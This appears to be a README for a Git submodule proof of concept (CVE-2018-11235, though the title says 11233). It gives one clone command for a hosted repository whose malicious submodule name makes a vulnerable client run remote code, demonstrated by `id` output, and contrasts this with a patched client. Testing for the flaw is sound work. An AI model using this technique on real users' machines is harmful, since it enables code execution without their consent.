# CVE-2018-11233 PoC

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11235  
http://otameshi61.hatenablog.com/entry/2018/06/01/094702

Test:
```bash
git clone --recurse-submodules https://shinkbr@bitbucket.org/shinkbr/test.git
```

## Vulnerable

```bash
% git clone --recurse-submodules https://shinkbr@bitbucket.org/shinkbr/test.git
Cloning into 'test'...
remote: Counting objects: 47, done.
remote: Compressing objects: 100% (34/34), done.
remote: Total 47 (delta 1), reused 0 (delta 0)
Unpacking objects: 100% (47/47), done.
Submodule 'another-module' (https://shinkbr@bitbucket.org/shinkbr/test_submodule.git) registered for path 'another-module'
Submodule '../../modules/evil' (https://shinkbr@bitbucket.org/shinkbr/test_submodule.git) registered for path 'evil'
Cloning into '/home/shin/Workspace/test/another-module'...
remote: Counting objects: 3, done.
remote: Total 3 (delta 0), reused 0 (delta 0)
Submodule path 'another-module': checked out '05f499731d6c9b161dd104f41278aa8de64ffd73'
!!!!!!!!!! VULNERABLE TO CVE-2018-11233 !!!!!!!!!!
uid=1000(shin) gid=50(staff) groups=50(staff),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),124(sambashare),999(docker),1000(shin)
Submodule path 'evil': checked out '05f499731d6c9b161dd104f41278aa8de64ffd73'
```

# Safe

```bash
% git clone --recurse-submodules https://shinkbr@bitbucket.org/shinkbr/test.git                                                                                                                                                           [kobo-mac:~/Workspace]
Cloning into 'test'...
remote: Counting objects: 47, done.
remote: Compressing objects: 100% (34/34), done.
remote: Total 47 (delta 1), reused 0 (delta 0)
Unpacking objects: 100% (47/47), done.
warning: ignoring suspicious submodule name: ../../modules/evil
warning: ignoring suspicious submodule name: ../../modules/evil
warning: ignoring suspicious submodule name: ../../modules/evil
Submodule 'another-module' (https://shinkbr@bitbucket.org/shinkbr/test_submodule.git) registered for path 'another-module'
warning: ignoring suspicious submodule name: ../../modules/evil
warning: ignoring suspicious submodule name: ../../modules/evil
warning: ignoring suspicious submodule name: ../../modules/evil
Cloning into '/Users/kobo/Workspace/test/another-module'...
remote: Counting objects: 3, done.
remote: Total 3 (delta 0), reused 0 (delta 0)
warning: ignoring suspicious submodule name: ../../modules/evil
warning: ignoring suspicious submodule name: ../../modules/evil
warning: ignoring suspicious submodule name: ../../modules/evil
Submodule path 'another-module': checked out '05f499731d6c9b161dd104f41278aa8de64ffd73'
```